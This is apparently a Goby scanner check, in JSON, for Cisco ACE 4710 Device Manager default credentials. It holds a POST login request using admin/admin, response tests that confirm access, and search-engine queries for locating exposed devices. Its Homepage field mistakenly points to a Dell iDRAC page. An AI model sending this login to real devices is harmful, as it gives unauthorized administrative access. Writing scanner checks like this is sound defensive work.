Goby/json/Cisco-ACE-4710-Device-Manager-Default-Credentials.json

{
  "Name": "Cisco ACE 4710 Device Manager Default Credentials",
  "Description": "The Cisco administrator 'admin' has a password that is set to the default value of 'admin'. As a result, anyone with access to the Cisco port can trivially gain full access to the machine via arbitrary remote code execution. ",
  "Product": "Cisco-ACE4710",
  "Homepage": "https://www.delltechnologies.com/en-us/solutions/openmanage/idrac.htm",
  "DisclosureDate": "2012-04-23",
  "Author": "gobysec@gmail.com",
  "FofaQuery": "body=\"ACE 4710 Device Manager\"",
  "GobyQuery": "body=\"ACE 4710 Device Manager\"",
  "Level": "3",
  "Impact": "Remote attacker can use this default to control the server.",
  "Recommendation": "It is imperative to change default manufacturer passwords and restrict network access to critical and important systems.",
  "References": [
    "https://fofa.so/"
  ],
  "HasExp": false,
  "ExpParams": [],
  "ExpTips": {
    "Type": "Tips",
    "Content": ""
  },
  "ScanSteps": [
    "OR",
	{
         "Request": {
           "data": "login_saved_parameters=&userName=admin&password=admin&command=login&login_url=%2Findex.vm",
           "data_type": "text",
           "follow_redirect": false,
           "header": {
             "Content-Type": "application/x-www-form-urlencoded"
           },
           "method": "POST",
           "uri": "/index.vm"
         },
         "ResponseTest": {
           "checks": [
             {
               "bz": "",
               "operation": "contains",
               "type": "item",
               "value": "ACE",
               "variable": "$body"
             },
			{
				"bz": "",
			   "operation": "not contains",
			   "type": "item",
			   "value": "Invalid User",
			   "variable": "$body"
			},
			{
				"bz": "",
			   "operation": "not contains",
			   "type": "item",
			   "value": "Cannot authenticate",
			   "variable": "$body"
			}
           ],
           "operation": "AND",
           "type": "group"
         },
         "SetVariable": []
    }
  ],
  "ExploitSteps": null,
  "Tags": [
    "defaultaccount"
  ],
  "CVEIDs": null,
  "CVSSScore": "10.0",
  "AttackSurfaces": {
    "Application": null,
    "Support": null,
    "Service": null,
    "System": null,
    "Hardware": ["Cisco-ACE4710"]
  },
  "Disable": false
}